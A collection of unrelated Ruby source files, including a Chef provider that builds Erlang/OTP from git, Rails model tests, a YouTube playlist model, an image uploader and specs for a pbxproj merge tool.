# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# Chef provider hook: this resource supports why-run (dry-run) mode.
def whyrun_supported?
  true
end
# Builds and installs Erlang/OTP from git unless #{prefix}/bin/erl
# already exists (presence of erl is the idempotency guard).
action :create do
  prefix = new_resource.prefix || node['erlang']['prefix']
  git_url = new_resource.git_url || node['erlang']['otp_git_url']
  ref = new_resource.ref || node['erlang']['otp_git_ref']
  config_flags = (new_resource.config_flags || node['erlang']['config_flags']).join(" ")
  user = new_resource.user
  group = new_resource.group
  skip_apps = (new_resource.skip_apps || node['erlang']['skip_apps']).join(",")
  cache_path = Chef::Config['file_cache_path']
  if FileTest.exists? "#{prefix}/bin/erl"
    Chef::Log.info "#{prefix}/bin/erl already exists"
  else
    converge_by("Create #{ref} in #{prefix}") do
      # install the platform-specific build prerequisites
      p = prereqs(skip_apps)
      p.each do |pkg|
        package pkg
      end
      # sync OTP sources into the Chef file cache
      git "erlang otp" do
        user user
        group group
        repository git_url
        destination "#{cache_path}/otp"
        action :sync
      end
      # copy the checkout per ref, configure, mark skipped apps, build;
      # touching lib/{app,...}/SKIP makes OTP's build omit those apps
      bash "install #{ref} to #{prefix}" do
        user user
        group group
        code <<-EOS
cp -r #{cache_path}/otp #{cache_path}/#{ref}
cd #{cache_path}/#{ref}
git checkout #{ref}
./otp_build autoconf
./configure --prefix=#{prefix} #{config_flags}
touch lib/{#{skip_apps}}/SKIP
make && make install
        EOS
      end
    end
  end
end
# Removes an installed Erlang/OTP tree.
action :delete do
  prefix = new_resource.prefix || node['erlang']['prefix']
  # BUG FIX: `ref` was never assigned in this action (it only existed in
  # :create), so reaching converge_by raised NameError whenever an
  # install was actually present to delete.
  ref = new_resource.ref || node['erlang']['otp_git_ref']
  if !FileTest.exists? "#{prefix}/bin/erl"
    Chef::Log.info "#{new_resource} not installed"
  else
    converge_by("Delete #{ref} from #{prefix}") do
      directory "#{prefix}" do
        recursive true
        action :delete
      end
    end
  end
end
# Returns the prerequisite packages for building Erlang/OTP on this
# platform, trimmed according to the apps being skipped.
def prereqs(skip)
  pkgs = ["m4"]
  case node['platform_family']
  when 'debian'
    pkgs += ["libncurses5-dev", "openssl", "libssl-dev"]
  when 'rhel'
    pkgs += ["ncurses-devel", "openssl-devel"]
  end
  # A JDK is only needed when jinterface/orber/ic are being built.
  unless skip.include?("jinterface") && skip.include?("orber") && skip.include?("ic")
    case node['platform_family']
    when 'debian'
      pkgs += ["openjdk-7-jre-headless"]
    when 'rhel'
      pkgs += ["java-1.6.0-openjdk-devel"]
    end
  end
  pkgs += ["unixodbc-dev"] unless skip.include?("odbc")
  pkgs
end
|
Pod::Spec.new do |s|
  s.name = 'YHPhotoBrowser'
  s.version = '1.0.1'
  s.summary = '类似于qq,微信,微博的图片浏览器:9宫格的图片,点击任何一张放大至全屏,并可以左右滑动查看所有图片.简易框架,易懂.'
  s.homepage = 'https://github.com/RusselYHCui/YHPhotoBrowser'
  s.license = 'MIT'
  s.author = { 'Russel_yh_Cui' => '960743995@qq.com' }
  s.platform = :ios, '8.0'
  s.source = {
    :git => 'https://github.com/RusselYHCui/YHPhotoBrowser.git',
    :tag => s.version.to_s
  }
  s.requires_arc = true
  s.source_files = 'YHPhotoBrowser/*.{h,m}'
  s.dependency 'SDWebImage'
  s.framework = 'UIKit', 'QuartzCore'
  # BUG FIX: an xcconfig build-setting reference needs a leading `$`;
  # the original '(SDKROOT)/...' was passed through literally, so the
  # libxml2 headers were never found.
  s.xcconfig = { 'HEADER_SEARCH_PATHS' => '$(SDKROOT)/usr/include/libxml2' }
end
require 'test_helper'

# Validation walk-through for Table: name presence, numeric/positive
# minimum_capacity, and the min/max cross-field check.
class TableTest < ActiveSupport::TestCase
  setup do
    @restaurant = create(:restaurant)
  end
  test 'validate name and table capacity' do
    table = build(:table, restaurant: @restaurant)
    table.name = nil
    assert_not table.valid?
    assert_equal "can't be blank", table.errors[:name].first
    table.name = 'T-23'
    assert table.valid?
    # non-numeric capacity is rejected
    table.minimum_capacity = 'abc'
    assert_not table.valid?
    assert_equal 'is not a number', table.errors[:minimum_capacity].first
    # capacity must be strictly positive
    table.minimum_capacity = -1
    assert_not table.valid?
    assert_equal 'must be greater than 0', table.errors[:minimum_capacity].first
    # NOTE(review): 99 presumably exceeds the factory's maximum_capacity,
    # which is what trips the cross-field error below — confirm the
    # factory's value to keep this assertion stable.
    table.minimum_capacity = 99
    assert_not table.valid?
    assert_equal 'cannot be less than minimum_capacity', table.errors[:maximum_capacity].first
    table.minimum_capacity = 1
    assert table.valid?
    assert table.save
  end
end
|
# RABL template for a board picture.
object @board_pic
attributes :id, :class_date, :created_at

# Nested image node including a generated thumbnail URL.
child :image => :image do
  attributes :url, :size, :content_type
  node :thumbnail_url do |img|
    img.url(:thumb)
  end
end

child :author => :author do
  attributes :id, :name
end
# Tracks whether a floor is dirty. A freshly created floor is dirty
# until washed.
class Floor
  attr_reader :dirty

  def initialize
    @dirty = true
  end

  # Reports the expected floor state on stdout, then returns the flag.
  def dirty?
    message = if dirty == false
                "The floor should be clean."
              else
                "The floor should be dirty."
              end
    puts message
    dirty
  end

  # Marks the floor as clean.
  def wash
    @dirty = false
  end
end
|
# Join model between Publication and Subject.
class SubjectsPublication < ActiveRecord::Base
  belongs_to :publication
  belongs_to :subject
  # attr_accessible :publication_id, :subject_id
  # Each (publication, subject) pair may appear at most once.
  validates_uniqueness_of :publication_id, :scope => :subject_id
end
|
require "spec_helper"

# Specs for PowerAPI::Data::Student: lazy construction, fetching a
# transcript over the PowerSchool SOAP API (mocked via Savon), and
# parsing a transcript fixture into sections and student information.
describe PowerAPI::Data::Student do
  include Savon::SpecHelper

  before(:all) {
    # Route every SOAP call in this file through Savon's mock.
    savon.mock!
    # Canned PowerSchool session payload as produced by authentication.
    @session = {:locale=>nil, :server_current_time=>"2014-08-24T03:01:25.007Z", :server_info=>{:api_version=>"2.1.1", :day_light_savings=>"0", :parent_saml_end_point=>nil, :raw_offset=>"-14400000", :server_time=>"2014-08-24T20:19:32.640Z", :student_saml_end_point=>nil, :teacher_saml_end_point=>nil, :time_zone_name=>"BOT", :"@xsi:type"=>"ax287:ServerInfo"}, :service_ticket=>"AAABSAX2Ex5NZXRA4/w06RyTFVkPGkFNEiI3qRAS5pMC7TQkWqT2UQYfVv0/c0SaE70JFJa17maweiMcP1u0skwbYAVPoyNvduejg61AdiePjqJPyhJyJGyGHi3UmuWI", :student_i_ds=>"1", :user_id=>"1", :user_type=>"2", :"@xsi:type"=>"ax284:UserSessionVO"}
  }

  after(:all) {
    savon.unmock!
  }

  describe "#initialize" do
    before(:each) {
      # Third argument false => do not fetch any data eagerly.
      @student = PowerAPI::Data::Student.new("http://powerschool.example", @session, false)
    }
    after(:each) {
      @student = nil
    }

    # Nothing is populated until fetch_transcript / parse_transcript run.
    it "returns nil for sections" do
      expect(
        @student.sections
      ).to be_nil
    end
    it "returns nil for information" do
      expect(
        @student.information
      ).to be_nil
    end
  end

  describe "#fetch_transcript" do
    it "returns something that looks like a transcript" do
      fixture = File.read("spec/fixtures/transcript.json")
      # Exact SOAP message the client is expected to build from @session.
      message = {
        userSessionVO: {
          userId: "1",
          serviceTicket: "AAABSAX2Ex5NZXRA4/w06RyTFVkPGkFNEiI3qRAS5pMC7TQkWqT2UQYfVv0/c0SaE70JFJa17maweiMcP1u0skwbYAVPoyNvduejg61AdiePjqJPyhJyJGyGHi3UmuWI",
          serverInfo: {
            apiVersion: "2.1.1"
          },
          serverCurrentTime: "2012-12-26T21:47:23.792Z",
          userType: "2"
        },
        studentIDs: "1",
        qil: {
          includes: "1"
        }
      }
      savon.expects(:get_student_data).with(message: message).returns(fixture)
      student = PowerAPI::Data::Student.new("http://powerschool.example", @session, false)
      transcript = student.fetch_transcript["return"]["studentDataVOs"]
      # Structural smoke test: all top-level transcript keys are present.
      expect(transcript).to include(
        "assignmentCategories", "assignments", "assignmentScores",
        "finalGrades", "reportingTerms", "schools",
        "sections", "student", "teachers"
      )
    end
  end

  describe "#parse_transcript" do
    before(:each) {
      fixture = File.read("spec/fixtures/transcript.json")
      fixture = JSON.parse(fixture)
      @student = PowerAPI::Data::Student.new("http://powerschool.example", @session, false)
      @student.parse_transcript(fixture)
    }
    after(:each) {
      @student = nil
    }

    it "has two sections" do
      expect(
        @student.sections.length
      ).to be(2)
    end
    it "returns the student's information" do
      # Full demographic hash expected from the fixture file.
      information = {
        "currentGPA"=>"4.0",
        "currentMealBalance"=>0,
        "currentTerm"=>"S1",
        "dcid"=>1,
        "dob"=>"1970-01-01T00:00:00.000Z",
        "ethnicity"=>"US",
        "firstName"=>"John",
        "gender"=>"M",
        "gradeLevel"=>12,
        "id"=>1,
        "lastName"=>"Doe",
        "middleName"=>{"@nil"=>"true"},
        "photoDate"=>{"@nil"=>"true"},
        "startingMealBalance"=>0
      }
      expect(
        @student.information
      ).to eq(information)
    end
  end
end
|
# frozen_string_literal: true

# Creates the cinemas table: one row per screen, with its seating grid.
class CreateCinemas < ActiveRecord::Migration[6.1]
  def change
    create_table :cinemas do |t|
      t.integer :cinema_number # public screen number (unique, see index below)
      t.integer :total_seats
      t.integer :columns       # seating grid width
      t.integer :rows          # seating grid height
      t.timestamps
    end
    # Screen numbers must be unique across the venue.
    add_index :cinemas, :cinema_number, unique: true
  end
end
|
require 'yt/models/resource'

module Yt
  module Models
    # Provides methods to interact with YouTube playlists.
    # @see https://developers.google.com/youtube/v3/docs/playlists
    class Playlist < Resource
      ### SNIPPET ###

      # @!attribute [r] title
      #   @return [String] the playlist’s title.
      delegate :title, to: :snippet

      # @!attribute [r] description
      #   @return [String] the playlist’s description.
      delegate :description, to: :snippet

      # @!method thumbnail_url(size = :default)
      #   Returns the URL of the playlist’s thumbnail.
      #   @param [Symbol, String] size The size of the playlist’s thumbnail.
      #   @return [String] if +size+ is +default+, the URL of a 120x90px image.
      #   @return [String] if +size+ is +medium+, the URL of a 320x180px image.
      #   @return [String] if +size+ is +high+, the URL of a 480x360px image.
      #   @return [nil] if the +size+ is not +default+, +medium+ or +high+.
      delegate :thumbnail_url, to: :snippet

      # @!attribute [r] published_at
      #   @return [Time] the date and time that the playlist was created.
      delegate :published_at, to: :snippet

      # @!attribute [r] channel_id
      #   @return [String] the ID of the channel that the playlist belongs to.
      delegate :channel_id, to: :snippet

      # @!attribute [r] channel_title
      #   @return [String] the title of the channel that the playlist belongs to.
      delegate :channel_title, to: :snippet

      # @!attribute [r] tags
      #   @return [Array<String>] the list of tags attached to the playlist.
      delegate :tags, to: :snippet

      ### STATISTICS ###

      has_one :content_detail

      # @!attribute [r] item_count
      #   @return [Integer] the number of items in the playlist.
      delegate :item_count, to: :content_detail

      ### ACTIONS (UPLOAD, UPDATE, DELETE) ###

      # Deletes the playlist.
      # @return [Boolean] whether the playlist does not exist anymore.
      # @raise [Yt::Errors::Unauthorized] if {Resource#auth auth} is not an
      #   authenticated Yt::Account with permissions to delete the playlist.
      def delete(options = {})
        do_delete { @id = nil }
        !exists?
      end

      # Updates the attributes of a playlist.
      # @return [Boolean] whether the playlist was successfully updated.
      # @raise [Yt::Errors::Unauthorized] if {Resource#auth auth} is not an
      #   authenticated Yt::Account with permissions to update the playlist.
      # @param [Hash] attributes the attributes to update.
      # @option attributes [String] :title The new playlist’s title.
      #   Cannot have more than 100 characters. Can include the characters
      #   < and >, which are replaced to ‹ › in order to be accepted by YouTube.
      # @option attributes [String] :description The new playlist’s description.
      #   Cannot have more than 5000 bytes. Can include the characters
      #   < and >, which are replaced to ‹ › in order to be accepted by YouTube.
      # @option attributes [Array<String>] :tags The new playlist’s tags.
      #   Cannot have more than 500 characters. Can include the characters
      #   < and >, which are replaced to ‹ › in order to be accepted by YouTube.
      # @option attributes [String] :privacy_status The new playlist’s privacy
      #   status. Must be one of: private, unscheduled, public.
      # @example Update title and description of a playlist.
      #   playlist.update title: 'New title', description: 'New description'
      # @example Update tags and status of a playlist.
      #   playlist.update tags: ['new', 'tags'], privacy_status: 'public'
      def update(attributes = {})
        super
      end

      # Adds a video to the playlist.
      # Unlike {#add_video!}, does not raise an error if video can’t be added.
      # @param [String] video_id the video to add to the playlist.
      # @param [Hash] options the options on how to add the video.
      # @option options [Integer] :position where to add video in the playlist.
      # @raise [Yt::Errors::Unauthorized] if {Resource#auth auth} is not an
      #   authenticated Yt::Account with permissions to update the playlist.
      # @return [Yt::PlaylistItem] the item added to the playlist.
      def add_video(video_id, options = {})
        # Renamed the local: the original `playlist_item_params = playlist_item_params(...)`
        # shadowed the private method of the same name.
        item_params = playlist_item_params(video_id, options)
        playlist_items.insert item_params, ignore_errors: true
      end

      # Adds a video to the playlist.
      # Unlike {#add_video}, raises an error if video can’t be added.
      # @param [String] video_id the video ID to add to the playlist.
      # @param [Hash] options the options on how to add the video.
      # @option options [Integer] :position where to add video in the playlist.
      # @raise [Yt::Errors::RequestError] if video can’t be added.
      # @raise [Yt::Errors::Unauthorized] if {Resource#auth auth} is not an
      #   authenticated Yt::Account with permissions to update the playlist.
      # @return [Yt::PlaylistItem] the item added to the playlist.
      def add_video!(video_id, options = {})
        item_params = playlist_item_params(video_id, options)
        playlist_items.insert item_params
      end

      # Adds multiple videos to the playlist.
      # Unlike {#add_videos!}, does not raise an error if videos can’t be added.
      # @param [Array<String>] video_ids the video IDs to add to the playlist.
      # @param [Hash] options the options on how to add the videos.
      # @option options [Integer] :position where to add videos in the playlist.
      # @raise [Yt::Errors::Unauthorized] if {Resource#auth auth} is not an
      #   authenticated Yt::Account with permissions to update the playlist.
      # @return [Array<Yt::PlaylistItem>] the items added to the playlist.
      def add_videos(video_ids = [], options = {})
        video_ids.map{|video_id| add_video video_id, options}
      end

      # Adds multiple videos to the playlist.
      # Unlike {#add_videos}, raises an error if videos can’t be added.
      # @param [Array<String>] video_ids the video IDs to add to the playlist.
      # @param [Hash] options the options on how to add the videos.
      # @option options [Integer] :position where to add videos in the playlist.
      # @raise [Yt::Errors::Unauthorized] if {Resource#auth auth} is not an
      #   authenticated Yt::Account with permissions to update the playlist.
      # @return [Array<Yt::PlaylistItem>] the items added to the playlist.
      def add_videos!(video_ids = [], options = {})
        video_ids.map{|video_id| add_video! video_id, options}
      end

      # Deletes the playlist’s items matching all the given attributes.
      # @return [Array<Boolean>] whether each playlist item matching the given
      #   attributes was deleted.
      # @raise [Yt::Errors::RequestError] if {Resource#auth auth} is not an
      #   authenticated Yt::Account with permissions to update the playlist.
      # @param [Hash] attributes the attributes to match the items by.
      # @option attributes [<String, Regexp>] :title The item’s title.
      #   Pass a String for perfect match or a Regexp for advanced match.
      # @option attributes [<String, Regexp>] :description The item’s
      #   description. Pass a String (perfect match) or a Regexp (advanced).
      # @option attributes [String] :privacy_status The item’s privacy status.
      # @option attributes [String] :video_id The item’s video ID.
      def delete_playlist_items(attributes = {})
        playlist_items.delete_all attributes
      end

      ### ASSOCIATIONS ###

      # @!attribute [r] playlist_items
      #   @return [Yt::Collections::PlaylistItems] the playlist’s items.
      has_many :playlist_items

      ### ANALYTICS ###

      # @macro reports

      # @macro report_by_playlist_dimensions
      has_report :views, Integer

      # @macro report_by_playlist_dimensions
      has_report :estimated_minutes_watched, Integer

      # @macro report_by_gender_and_age_group
      has_report :viewer_percentage, Float

      # @macro report_by_day_and_state
      has_report :average_view_duration, Integer

      # @macro report_by_day_and_state
      has_report :playlist_starts, Integer

      # @macro report_by_day_and_state
      has_report :average_time_in_playlist, Float

      # @macro report_by_day_and_state
      has_report :views_per_playlist_start, Float

      ### PRIVATE API ###

      # @private
      # Override Resource's new to set content details as well
      # if the response includes them
      def initialize(options = {})
        super options
        if options[:content_details]
          @content_detail = ContentDetail.new data: options[:content_details]
        end
      end

      # @private
      # Tells `has_reports` to retrieve the reports from YouTube Analytics API
      # either as a Channel or as a Content Owner.
      # @see https://developers.google.com/youtube/analytics/v1/reports
      def reports_params
        {}.tap do |params|
          if auth.owner_name
            params[:ids] = "contentOwner==#{auth.owner_name}"
          else
            params[:ids] = "channel==#{channel_id}"
          end
          params[:filters] = "playlist==#{id};isCurated==1"
        end
      end

      # @private
      # A playlist exists as long as it still has an ID (cleared by #delete).
      def exists?
        !@id.nil?
      end

    private

      # @see https://developers.google.com/youtube/v3/docs/playlists/update
      def update_parts
        keys = [:title, :description, :tags]
        snippet = {keys: keys, required: true, sanitize_brackets: true}
        status = {keys: [:privacy_status]}
        {snippet: snippet, status: status}
      end

      # @todo: extend camelize to also camelize the nested hashes, so we
      #   don’t have to write videoId
      def playlist_item_params(video_id, params = {})
        # Block parameter renamed: `|params|` shadowed the method parameter.
        params.dup.tap do |item_params|
          item_params[:resource_id] ||= {kind: 'youtube#video', videoId: video_id}
        end
      end
    end
  end
end
# encoding: utf-8
# CarrierWave uploader: limits image size, converts to JPG, and keeps a thumbnail.
class ImageUploader < CarrierWave::Uploader::Base
  # Needed for resizing and changing the image format.
  include CarrierWave::RMagick
  # Cap the image at 700px on its longest side.
  process :resize_to_limit => [700, 700]
  # Store everything in JPG format.
  process :convert => 'jpg'
  # Thumbnail version (max 73x73px).
  version :thumb do
    process :resize_to_limit => [73, 73]
  end
  # Only jpg, jpeg, gif and png uploads are accepted.
  def extension_white_list
    %w(jpg jpeg gif png)
  end
  # Permanent storage path, namespaced by the owning model's id.
  def store_dir
    "uploads/#{model.id}"
  end
  # Temporary cache path used during upload processing.
  def cache_dir
    "tmp/uploads/cache/#{model.id}"
  end
end
require 'minitest/spec'
require 'minitest/autorun'
require File.expand_path(File.join('..', 'lib/parser.rb'), File.dirname(__FILE__))
require File.expand_path(File.join('..', 'lib/pbxproj_nodes.rb'), File.dirname(__FILE__))
# Three-way merge helper for pbxproj node lists. Classifies each node of
# the local and remote branches against a common base (:unchanged,
# :updated, :inserted, :deleted). Actual merge resolution is still
# pending (see the skipped specs below), so merged/conflicts stay empty.
class PbxMerge
  attr_accessor :merged, :conflicts

  # @param lists [Hash] with :base, :local and :remote arrays of nodes
  #   responding to #content_match? and #==.
  def initialize(lists)
    @merged = []
    @conflicts = []
    # Classification results are not consumed yet; merge resolution is
    # still to be implemented.
    local_matches = branch_matches lists[:local], lists[:base]
    remote_matches = branch_matches lists[:remote], lists[:base]
    partners = []
  end

  private

  # Classifies every node of +branch+ relative to +base+ and returns a
  # list of {:branch_node, :base_node, :type} hashes, where :type is one
  # of :unchanged, :updated, :inserted or :deleted.
  def branch_matches(branch, base)
    matches = []
    branch.each do |node|
      base_index = base.index {|base_node| base_node.content_match? node}
      if base_index
        base_node = base[base_index]
        match_type = :updated
        match_type = :unchanged if node == base_node
        matches << {:branch_node => node, :base_node => base_node, :type => match_type}
      else
        matches << {:branch_node => node, :base_node => nil, :type => :inserted}
      end
    end
    # Bug fix: this loop previously referenced `local_matches`, a local
    # variable of #initialize that is undefined here — any non-empty base
    # raised NameError. A base node with no content match in the branch
    # itself is the one that was deleted.
    base.each do |base_node|
      match_index = branch.index {|node| node.content_match? base_node}
      unless match_index
        matches << {:branch_node => nil, :base_node => base_node, :type => :deleted}
      end
    end
    matches
  end
end
# Scenario matrix for PbxMerge: every combination of unchanged / changed /
# deleted / added build-file objects in local vs. remote, relative to a
# common base. All merge assertions are skipped until merge behavior is
# implemented ("merge behavior pending").
describe PbxMerge do
  before do
    # Shared pbxproj fragments; the base file contains two build-file
    # entries between the header and footer.
    @header = <<'END_PBXPROJ_CONTENT'
{
objects = {
END_PBXPROJ_CONTENT
    @content = <<'END_PBXPROJ_CONTENT'
8C00F4F6141D3E8400CCAB3D /* ExampleSpec.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F5141D3E8400CCAB3D /* ExampleSpec.m */; };
8C00F4F8141D3E9B00CCAB3D /* ExampleTest.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F7141D3E9B00CCAB3D /* ExampleTest.m */; };
END_PBXPROJ_CONTENT
    @footer = <<'END_PBXPROJ_CONTENT'
};
}
END_PBXPROJ_CONTENT
    @base_content = '' + @header + @content + @footer
    @base = Parser.parse(@base_content).build_files
  end

  describe "objects unchanged in local and unchanged in remote" do
    before do
      @local = Parser.parse(@base_content).build_files
      @remote = Parser.parse(@base_content).build_files
    end
    it "takes the local version" do
      skip "merge behavior pending"
      merge = PbxMerge.new(:base => @base, :local => @local, :remote => @remote)
      merge.merged.must_equal @local
      merge.conflicts.wont_equal nil
    end
  end

  describe "objects unchanged in local and deleted in remote" do
    before do
      @local = Parser.parse(@base_content).build_files
      # Remote keeps only the ExampleSpec entry (ExampleTest deleted).
      @remote_content = '' + @header
      @remote_content << <<'END_PBXPROJ_CONTENT'
8C00F4F6141D3E8400CCAB3D /* ExampleSpec.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F5141D3E8400CCAB3D /* ExampleSpec.m */; };
END_PBXPROJ_CONTENT
      @remote_content << @footer
      @remote = Parser.parse(@remote_content).build_files
    end
    it "deletes the object" do
      skip "merge behavior pending"
      merge = PbxMerge.new(:base => @base, :local => @local, :remote => @remote)
      merge.merged.must_equal @remote
      merge.conflicts.wont_equal nil
    end
  end

  describe "objects unchanged in local and changed in remote" do
    before do
      @local = Parser.parse(@base_content).build_files
      # Remote changes ExampleTest's fileRef (F33DF00D...).
      @remote_content = '' + @header
      @remote_content << <<'END_PBXPROJ_CONTENT'
8C00F4F6141D3E8400CCAB3D /* ExampleSpec.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F5141D3E8400CCAB3D /* ExampleSpec.m */; };
8C00F4F8141D3E9B00CCAB3D /* ExampleTest.m in Sources */ = {isa = PBXBuildFile; fileRef = F33DF00DF33DF00DF33DF00D /* ExampleTest.m */; };
END_PBXPROJ_CONTENT
      @remote_content << @footer
      @remote = Parser.parse(@remote_content).build_files
    end
    it "takes the remote version" do
      skip "merge behavior pending"
      merge = PbxMerge.new(:base => @base, :local => @local, :remote => @remote)
      merge.merged.must_equal @remote
      merge.conflicts.wont_equal nil
    end
  end

  describe "objects deleted in local and unchanged in remote" do
    before do
      # Local keeps only the ExampleTest entry (ExampleSpec deleted).
      @local_content = '' + @header
      @local_content << <<'END_PBXPROJ_CONTENT'
8C00F4F8141D3E9B00CCAB3D /* ExampleTest.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F7141D3E9B00CCAB3D /* ExampleTest.m */; };
END_PBXPROJ_CONTENT
      @local_content << @footer
      @local = Parser.parse(@local_content).build_files
      @remote = Parser.parse(@base_content).build_files
    end
    it "deletes the object" do
      skip "merge behavior pending"
      merge = PbxMerge.new(:base => @base, :local => @local, :remote => @remote)
      merge.merged.must_equal @local
      merge.conflicts.wont_equal nil
    end
  end

  describe "objects deleted in local and deleted in remote" do
    before do
      # Both sides delete everything: header + footer only.
      @content = '' + @header + @footer
      @local = Parser.parse(@content).build_files
      @remote = Parser.parse(@content).build_files
    end
    it "deletes the object" do
      skip "merge behavior pending"
      merge = PbxMerge.new(:base => @base, :local => @local, :remote => @remote)
      merge.merged.must_equal @local
      merge.conflicts.wont_equal nil
    end
  end

  describe "objects deleted in local and changed in remote" do
    before do
      @local_content = '' + @header
      @local_content << <<'END_PBXPROJ_CONTENT'
8C00F4F8141D3E9B00CCAB3D /* ExampleTest.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F7141D3E9B00CCAB3D /* ExampleTest.m */; };
END_PBXPROJ_CONTENT
      @local_content << @footer
      @local = Parser.parse(@local_content).build_files
      @remote_content = '' + @header
      @remote_content << <<'END_PBXPROJ_CONTENT'
8C00F4F6141D3E8400CCAB3D /* ExampleSpec.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F5141D3E8400CCAB3D /* ExampleSpec.m */; };
8C00F4F8141D3E9B00CCAB3D /* ExampleTest.m in Sources */ = {isa = PBXBuildFile; fileRef = F33DF00DF33DF00DF33DF00D /* ExampleTest.m */; };
END_PBXPROJ_CONTENT
      @remote_content << @footer
      @remote = Parser.parse(@remote_content).build_files
    end
    it "reports a conflict" do
      skip "merge behavior pending"
      merge = PbxMerge.new(:base => @base, :local => @local, :remote => @remote)
      merge.conflicts.wont_equal(nil) && merge.conflicts.length.wont_equal(0)
    end
  end

  describe "objects changed in local and unchanged in remote" do
    before do
      @local_content = '' + @header
      @local_content << <<'END_PBXPROJ_CONTENT'
8C00F4F6141D3E8400CCAB3D /* ExampleSpec.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F5141D3E8400CCAB3D /* ExampleSpec.m */; };
8C00F4F8141D3E9B00CCAB3D /* ExampleTest.m in Sources */ = {isa = PBXBuildFile; fileRef = F33DF00DF33DF00DF33DF00D /* ExampleTest.m */; };
END_PBXPROJ_CONTENT
      @local_content << @footer
      @local = Parser.parse(@local_content).build_files
      @remote = Parser.parse(@base_content).build_files
    end
    it "takes the local version" do
      skip "merge behavior pending"
      merge = PbxMerge.new(:base => @base, :local => @local, :remote => @remote)
      merge.merged.must_equal @local
      merge.conflicts.wont_equal nil
    end
  end

  describe "objects changed in local and deleted in remote" do
    before do
      @local_content = '' + @header
      @local_content << <<'END_PBXPROJ_CONTENT'
8C00F4F6141D3E8400CCAB3D /* ExampleSpec.m in Sources */ = {isa = PBXBuildFile; fileRef = F33DF00DF33DF00DF33DF00D /* ExampleSpec.m */; };
8C00F4F8141D3E9B00CCAB3D /* ExampleTest.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F7141D3E9B00CCAB3D /* ExampleTest.m */; };
END_PBXPROJ_CONTENT
      @local_content << @footer
      @local = Parser.parse(@local_content).build_files
      @remote_content = '' + @header
      @remote_content << <<'END_PBXPROJ_CONTENT'
8C00F4F8141D3E9B00CCAB3D /* ExampleTest.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F7141D3E9B00CCAB3D /* ExampleTest.m */; };
END_PBXPROJ_CONTENT
      @remote_content << @footer
      @remote = Parser.parse(@remote_content).build_files
    end
    it "reports a conflict" do
      skip "merge behavior pending"
      merge = PbxMerge.new(:base => @base, :local => @local, :remote => @remote)
      merge.conflicts.wont_equal(nil) && merge.conflicts.length.wont_equal(0)
    end
  end

  describe "objects changed in local and changed in remote" do
    before do
      # Both sides change ExampleSpec's fileRef, to different values.
      @local_content = '' + @header
      @local_content << <<'END_PBXPROJ_CONTENT'
8C00F4F6141D3E8400CCAB3D /* ExampleSpec.m in Sources */ = {isa = PBXBuildFile; fileRef = F33DF00DF33DF00DF33DF00D /* ExampleSpec.m */; };
8C00F4F8141D3E9B00CCAB3D /* ExampleTest.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F7141D3E9B00CCAB3D /* ExampleTest.m */; };
END_PBXPROJ_CONTENT
      @local_content << @footer
      @local = Parser.parse(@local_content).build_files
      @remote_content = '' + @header
      @remote_content << <<'END_PBXPROJ_CONTENT'
8C00F4F6141D3E8400CCAB3D /* ExampleSpec.m in Sources */ = {isa = PBXBuildFile; fileRef = D34DB33FD34DB33FD34DB33F /* ExampleSpec.m */; };
8C00F4F8141D3E9B00CCAB3D /* ExampleTest.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F7141D3E9B00CCAB3D /* ExampleTest.m */; };
END_PBXPROJ_CONTENT
      @remote_content << @footer
      @remote = Parser.parse(@remote_content).build_files
    end
    it "reports a conflict" do
      skip "merge behavior pending"
      merge = PbxMerge.new(:base => @base, :local => @local, :remote => @remote)
      merge.conflicts.wont_equal(nil) && merge.conflicts.length.wont_equal(0)
    end
  end

  describe "objects added in local and objects added in remote" do
    before do
      # Local adds the .h file reference, remote adds the .m one.
      @local_content = '' + @header
      @local_content << <<'END_PBXPROJ_CONTENT'
8C992EE8137B6E7B00DD2CA7 /* ProjectCrayonsAppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ProjectCrayonsAppDelegate.h; sourceTree = "<group>"; };
8C00F4F6141D3E8400CCAB3D /* ExampleSpec.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F5141D3E8400CCAB3D /* ExampleSpec.m */; };
8C00F4F8141D3E9B00CCAB3D /* ExampleTest.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F7141D3E9B00CCAB3D /* ExampleTest.m */; };
END_PBXPROJ_CONTENT
      @local_content << @footer
      @local = Parser.parse(@local_content).build_files
      @remote_content = '' + @header
      @remote_content << <<'END_PBXPROJ_CONTENT'
8C992EE9137B6E7B00DD2CA7 /* ProjectCrayonsAppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = ProjectCrayonsAppDelegate.m; sourceTree = "<group>"; };
8C00F4F6141D3E8400CCAB3D /* ExampleSpec.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F5141D3E8400CCAB3D /* ExampleSpec.m */; };
8C00F4F8141D3E9B00CCAB3D /* ExampleTest.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C00F4F7141D3E9B00CCAB3D /* ExampleTest.m */; };
END_PBXPROJ_CONTENT
      @remote_content << @footer
      @remote = Parser.parse(@remote_content).build_files
    end
    it "takes all new objects" do
      skip "merge behavior pending"
      merge = PbxMerge.new(:base => @base, :local => @local, :remote => @remote)
      merge.merged.length.must_equal 4
      merge.conflicts.wont_equal nil
    end
  end

  describe "multiple changes" do
    it "merges the changes" do
      skip "merge behavior pending"
    end
  end
end
|
# -*- coding: utf-8 -*-
# (Fix: the original magic comment had a space before the colon —
# "coding : utf-8" — which Ruby does not recognize as an encoding comment.)
require 'spec_helper'

# Construction specs for Mushikago::Hanamgri::GetAnalysisRequest.
describe Mushikago::Hanamgri::GetAnalysisRequest do
  context '.new("domain_name", "request_id")' do
